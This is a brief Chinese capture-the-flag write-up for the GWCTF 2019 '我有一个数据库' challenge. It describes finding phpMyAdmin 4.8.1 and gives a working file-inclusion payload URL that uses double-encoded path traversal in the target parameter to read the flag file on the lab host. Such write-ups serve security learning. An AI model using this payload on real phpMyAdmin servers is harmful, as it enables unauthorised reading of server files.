[GWCTF 2019]我有一个数据库 - 润新知

[GWCTF 2019]我有一个数据库
知识点

phpmyadmin的远程文件读取漏洞

审题

我本来看这个题目是想着把这字放到winhex里面导出.db文件然后拖到sqlite里面没想到啊没想到竟然又是扫描工具扫

phpmyadmin的远程文件读取漏洞

扫到了phpmyadmin的页面百度了一下4.8.1版本有远程文件包含漏洞
payload:
```
http://5343f641-d587-4d9e-838d-fec4d74c0c42.node3.buuoj.cn/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag
```
emmm不知道咋说还是记一下吧

EOF
相关阅读:
VWG中设置URL编码的方法
 wordwrap breakword
iis6下配置支持.net4.0&发布网站[转]
MySQL修复打不开的视图定义
 DHTML CSS+JavaScript设计网页链接提示ToolTips
C# 计算文件的MD5值
 .Net+IIS环境经常出现的问题及排障[转]
我的WCF之旅（1）：创建一个简单的WCF程序[转]
C#嵌套类的使用方法及特性[转]
设置<table>的固定长度
原文地址：https://www.cnblogs.com/zhwyyswdg/p/14304848.html

Copyright © 2020-2023 润新知